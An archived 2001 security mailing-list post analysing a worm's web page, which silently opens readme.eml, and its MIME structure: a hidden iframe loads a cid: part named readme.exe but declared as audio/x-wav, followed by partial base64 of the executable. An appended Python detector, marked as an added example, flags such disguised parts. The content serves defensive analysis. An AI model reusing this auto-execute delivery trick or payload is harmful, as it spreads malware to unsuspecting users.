Vulnerability Development mailing list archives

Re: New Worm


From: Ray Simard <ray.simard () sylvan-glade com>
Date: Tue, 18 Sep 2001 15:12:57 -0700

On Tue, 18 Sep 2001 11:17:23 -0500, "Enrique A. Compañ Gzz."
<enrique () virtekweb net> wrote:

...
Don't go there if you aren't protected. It downloads readme.eml
automatically and executes.

It seg faults on my machine... fortunately

This is what's on the page in raw form (some line breaks added):

telnet 64.218.116.235 80
Trying 64.218.116.235...
Connected to 64.218.116.235.
Escape character is '^]'.
GET /
<html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td>
<p align="center"><font size=7 color=red>fuck USA Government</font><tr><td>
<p align="center"><font size=7 color=red>fuck PoizonBOx<tr><td>
<p align="center"><font size=4 color=red>contact:sysadmcn () yahoo com cn</html>

<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>Connection closed by foreign host.


These are the headers and a few lines of the code from the readme.eml:

telnet 64.218.116.235 80
Trying 64.218.116.235...
Connected to 64.218.116.235.
Escape character is '^]'.
GET /readme.eml

MIME-Version: 1.0
Content-Type: multipart/related;
        type="multipart/alternative";
        boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
        boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
        name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
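An added example, not part of the original post, that checks a message for the pattern in the dump above using Python's standard email module: the hidden iframe pointing at a cid: part, and a part declared as audio/x-wav whose decoded body is really a DOS/PE executable (the "TVqQ" at the start of the base64 above decodes to the "MZ" magic). The sample message is constructed to mirror the dump, with a stub payload in place of the worm binary.

```python
import base64
import email
import re

# Constructed sample .eml mirroring the dump above (one multipart level, for brevity):
# an HTML part whose hidden iframe points at a cid:, and an "audio/x-wav" part that
# really carries a DOS/PE image. The base64 body is a stub ("MZ" magic plus padding).
SAMPLE_EML = (
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/related; boundary="OUTER"\r\n'
    "\r\n"
    "--OUTER\r\n"
    'Content-Type: text/html; charset="iso-8859-1"\r\n'
    "\r\n"
    "<HTML><BODY><iframe src=cid:EA4DMGBP9p height=0 width=0></iframe></BODY></HTML>\r\n"
    "--OUTER\r\n"
    'Content-Type: audio/x-wav; name="readme.exe"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    "Content-ID: <EA4DMGBP9p>\r\n"
    "\r\n"
    + base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60).decode() + "\r\n"
    "--OUTER--\r\n"
)

# src=cid:... in decoded HTML (decode=True already turned the dump's "=3D" into "=").
CID_REF = re.compile(r'src\s*=\s*"?cid:([^"\s>]+)', re.IGNORECASE)
EXEC_TYPES = {"application/octet-stream", "application/x-msdownload"}


def find_disguised_executables(raw: str) -> list:
    """Flag leaf parts whose decoded body starts with 'MZ'; note cid: references from HTML."""
    msg = email.message_from_string(raw)
    referenced = set()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            html = (part.get_payload(decode=True) or b"").decode("latin-1")
            referenced.update(CID_REF.findall(html))
    findings = []
    for part in msg.walk():
        body = part.get_payload(decode=True) or b""  # None for multipart containers
        if not body.startswith(b"MZ"):
            continue
        cid = (part.get("Content-ID") or "").strip("<>")
        findings.append({
            "declared_type": part.get_content_type(),
            "filename": part.get_filename(),
            "content_id": cid,
            "referenced_by_html": cid in referenced,
            "type_mismatch": part.get_content_type() not in EXEC_TYPES,
        })
    return findings
```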
